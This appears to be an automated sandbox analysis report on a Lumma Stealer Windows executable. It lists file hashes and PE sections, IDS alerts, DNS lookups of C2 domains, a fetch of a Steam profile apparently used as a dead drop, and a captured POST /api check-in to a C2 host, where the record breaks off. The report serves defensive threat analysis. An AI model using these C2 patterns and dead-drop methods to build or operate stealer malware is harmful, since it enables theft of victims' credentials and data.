                                                                            lHHfXU6Y37.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.53.8
                                                                            • 104.102.49.254

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            No created / dropped files found

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.947563861292693
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:file.exe
                                                                            File size:1'862'144 bytes
                                                                            MD5:f6573e376463c493395a0189bd5b6a54
                                                                            SHA1:3e297be62c83074742fb4e6515fa80e700be85de
                                                                            SHA256:1cd1a6c8b63ce8cf1ac0de34237bcbdac46f8c613536c7f1e7ad0091420def25
                                                                            SHA512:5fd56a85aa33375a41e31d94df53eda6e2c343873823bab5ca410f5f45d7edb38df79278cc22e13d1bca78804924176edfdc35326f0a17ca763077f6c736bfe3
                                                                            SSDEEP:49152:/Vp2C+33W4C4mygC/Gepznh50lqny4y0://2H3A4jgwGet49
                                                                            TLSH:398533C4BBDE5DCDCCC035B426BB33CD06F15A236D8A56B13B0B6154780E325E6AD9A1
                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f..............................J...........@...........................J......u....@.................................W...k..

                                                                            File Icon

                                                                            Icon Hash:00928e8e8686b000

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x8aa000
                                                                            Entrypoint Section:.taggant
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp 00007FB5F92FCB3Ah
                                                                            cmovs ebx, dword ptr [eax+eax]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            jmp 00007FB5F92FEB35h
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            0x10000x5d0000x25e00d688009f2858a1c34b56d6619b76aaa5False0.9995487830033003data7.982390407812277IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            0x600000x2ab0000x200c8e227c519ebef18d0e42845ca1660d1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            zrjduasp0x30b0000x19e0000x19d200527fcbe6f6da8e27b9305cea6b518f60False0.9943019572617247OpenPGP Public Key7.953168337560915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            mirbuaqc0x4a90000x10000x40097714c3ad05cac05d0a73804dc6d287eFalse0.7890625data6.270728290961721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .taggant0x4aa0000x30000x2200f3fc40a42fe7eb99b753dd1cc5f26406False0.025160845588235295DOS executable (COM)0.19895209659149263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                            Imports

                                                                            DLLImport
                                                                            kernel32.dlllstrcpy

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-10-08T11:18:14.824632+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.6523361.1.1.153UDP
                                                                            2024-10-08T11:18:14.838524+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.6500361.1.1.153UDP
                                                                            2024-10-08T11:18:14.856619+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.6549381.1.1.153UDP
                                                                            2024-10-08T11:18:14.871467+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.6499091.1.1.153UDP
                                                                            2024-10-08T11:18:14.881616+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.6611191.1.1.153UDP
                                                                            2024-10-08T11:18:14.893324+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.6556741.1.1.153UDP
                                                                            2024-10-08T11:18:14.904220+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.6587221.1.1.153UDP
                                                                            2024-10-08T11:18:14.916624+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.6511631.1.1.153UDP
                                                                            2024-10-08T11:18:17.550359+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649713104.21.53.8443TCP
                                                                            2024-10-08T11:18:17.550359+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649713104.21.53.8443TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 8, 2024 11:18:14.947525978 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:14.947549105 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:14.947782993 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:14.950470924 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:14.950493097 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:15.705154896 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:15.705254078 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:15.800448895 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:15.800473928 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:15.800865889 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:15.846533060 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:15.893838882 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:15.935431957 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.323435068 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.323467970 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.323503017 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.323517084 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:16.323518991 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.323538065 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.323549986 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.323584080 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:16.323606968 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:16.428270102 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.428344011 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.428359985 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:16.428375006 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.428410053 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:16.428433895 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:16.433536053 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.433607101 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:16.433633089 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.433681965 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:16.433687925 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.433794022 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.433847904 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:16.435978889 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:16.435992956 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.436011076 CEST49711443192.168.2.6104.102.49.254
                                                                            Oct 8, 2024 11:18:16.436017036 CEST44349711104.102.49.254192.168.2.6
                                                                            Oct 8, 2024 11:18:16.565285921 CEST49713443192.168.2.6104.21.53.8
                                                                            Oct 8, 2024 11:18:16.565306902 CEST44349713104.21.53.8192.168.2.6
                                                                            Oct 8, 2024 11:18:16.565373898 CEST49713443192.168.2.6104.21.53.8
                                                                            Oct 8, 2024 11:18:16.565769911 CEST49713443192.168.2.6104.21.53.8
                                                                            Oct 8, 2024 11:18:16.565784931 CEST44349713104.21.53.8192.168.2.6
                                                                            Oct 8, 2024 11:18:17.066277027 CEST44349713104.21.53.8192.168.2.6
                                                                            Oct 8, 2024 11:18:17.066371918 CEST49713443192.168.2.6104.21.53.8
                                                                            Oct 8, 2024 11:18:17.068135977 CEST49713443192.168.2.6104.21.53.8
                                                                            Oct 8, 2024 11:18:17.068154097 CEST44349713104.21.53.8192.168.2.6
                                                                            Oct 8, 2024 11:18:17.068533897 CEST44349713104.21.53.8192.168.2.6
                                                                            Oct 8, 2024 11:18:17.070408106 CEST49713443192.168.2.6104.21.53.8
                                                                            Oct 8, 2024 11:18:17.070408106 CEST49713443192.168.2.6104.21.53.8
                                                                            Oct 8, 2024 11:18:17.070486069 CEST44349713104.21.53.8192.168.2.6
                                                                            Oct 8, 2024 11:18:17.550369978 CEST44349713104.21.53.8192.168.2.6
                                                                            Oct 8, 2024 11:18:17.550477028 CEST44349713104.21.53.8192.168.2.6
                                                                            Oct 8, 2024 11:18:17.550575018 CEST49713443192.168.2.6104.21.53.8
                                                                            Oct 8, 2024 11:18:17.550810099 CEST49713443192.168.2.6104.21.53.8
                                                                            Oct 8, 2024 11:18:17.550832987 CEST44349713104.21.53.8192.168.2.6
                                                                            Oct 8, 2024 11:18:17.550858974 CEST49713443192.168.2.6104.21.53.8
                                                                            Oct 8, 2024 11:18:17.550863981 CEST44349713104.21.53.8192.168.2.6

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 8, 2024 11:18:14.824631929 CEST5233653192.168.2.61.1.1.1
                                                                            Oct 8, 2024 11:18:14.834173918 CEST53523361.1.1.1192.168.2.6
                                                                            Oct 8, 2024 11:18:14.838524103 CEST5003653192.168.2.61.1.1.1
                                                                            Oct 8, 2024 11:18:14.847332001 CEST53500361.1.1.1192.168.2.6
                                                                            Oct 8, 2024 11:18:14.856618881 CEST5493853192.168.2.61.1.1.1
                                                                            Oct 8, 2024 11:18:14.865694046 CEST53549381.1.1.1192.168.2.6
                                                                            Oct 8, 2024 11:18:14.871467113 CEST4990953192.168.2.61.1.1.1
                                                                            Oct 8, 2024 11:18:14.880131006 CEST53499091.1.1.1192.168.2.6
                                                                            Oct 8, 2024 11:18:14.881616116 CEST6111953192.168.2.61.1.1.1
                                                                            Oct 8, 2024 11:18:14.891772985 CEST53611191.1.1.1192.168.2.6
                                                                            Oct 8, 2024 11:18:14.893323898 CEST5567453192.168.2.61.1.1.1
                                                                            Oct 8, 2024 11:18:14.902930021 CEST53556741.1.1.1192.168.2.6
                                                                            Oct 8, 2024 11:18:14.904220104 CEST5872253192.168.2.61.1.1.1
                                                                            Oct 8, 2024 11:18:14.913741112 CEST53587221.1.1.1192.168.2.6
                                                                            Oct 8, 2024 11:18:14.916624069 CEST5116353192.168.2.61.1.1.1
                                                                            Oct 8, 2024 11:18:14.931922913 CEST53511631.1.1.1192.168.2.6
                                                                            Oct 8, 2024 11:18:14.936019897 CEST6034653192.168.2.61.1.1.1
                                                                            Oct 8, 2024 11:18:14.943624020 CEST53603461.1.1.1192.168.2.6
                                                                            Oct 8, 2024 11:18:16.439959049 CEST6140653192.168.2.61.1.1.1
                                                                            Oct 8, 2024 11:18:16.564234972 CEST53614061.1.1.1192.168.2.6

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Oct 8, 2024 11:18:14.824631929 CEST192.168.2.61.1.1.10xdb56Standard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.838524103 CEST192.168.2.61.1.1.10x9daaStandard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.856618881 CEST192.168.2.61.1.1.10x7b68Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.871467113 CEST192.168.2.61.1.1.10x7ad0Standard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.881616116 CEST192.168.2.61.1.1.10x3067Standard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.893323898 CEST192.168.2.61.1.1.10x7f18Standard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.904220104 CEST192.168.2.61.1.1.10x8078Standard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.916624069 CEST192.168.2.61.1.1.10x6140Standard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.936019897 CEST192.168.2.61.1.1.10x40f1Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:16.439959049 CEST192.168.2.61.1.1.10xc0a8Standard query (0)sergei-esenin.comA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Oct 8, 2024 11:18:14.834173918 CEST1.1.1.1192.168.2.60xdb56Name error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.847332001 CEST1.1.1.1192.168.2.60x9daaName error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.865694046 CEST1.1.1.1192.168.2.60x7b68Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.880131006 CEST1.1.1.1192.168.2.60x7ad0Name error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.891772985 CEST1.1.1.1192.168.2.60x3067Name error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.902930021 CEST1.1.1.1192.168.2.60x7f18Name error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.913741112 CEST1.1.1.1192.168.2.60x8078Name error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.931922913 CEST1.1.1.1192.168.2.60x6140Name error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:14.943624020 CEST1.1.1.1192.168.2.60x40f1No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:16.564234972 CEST1.1.1.1192.168.2.60xc0a8No error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                                                            Oct 8, 2024 11:18:16.564234972 CEST1.1.1.1192.168.2.60xc0a8No error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • steamcommunity.com
                                                                            • sergei-esenin.com

                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.649711104.102.49.2544435948C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-08 09:18:15 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Host: steamcommunity.com
                                                                            2024-10-08 09:18:16 UTC1870INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                            Cache-Control: no-cache
                                                                            Date: Tue, 08 Oct 2024 09:18:16 GMT
                                                                            Content-Length: 34837
                                                                            Connection: close
                                                                            Set-Cookie: sessionid=dd0e3a7e933c98927cc25668; Path=/; Secure; SameSite=None
                                                                            Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                            2024-10-08 09:18:16 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                            2024-10-08 09:18:16 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                            Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                            2024-10-08 09:18:16 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                            Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                            2024-10-08 09:18:16 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.649713104.21.53.84435948C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-08 09:18:17 UTC264OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
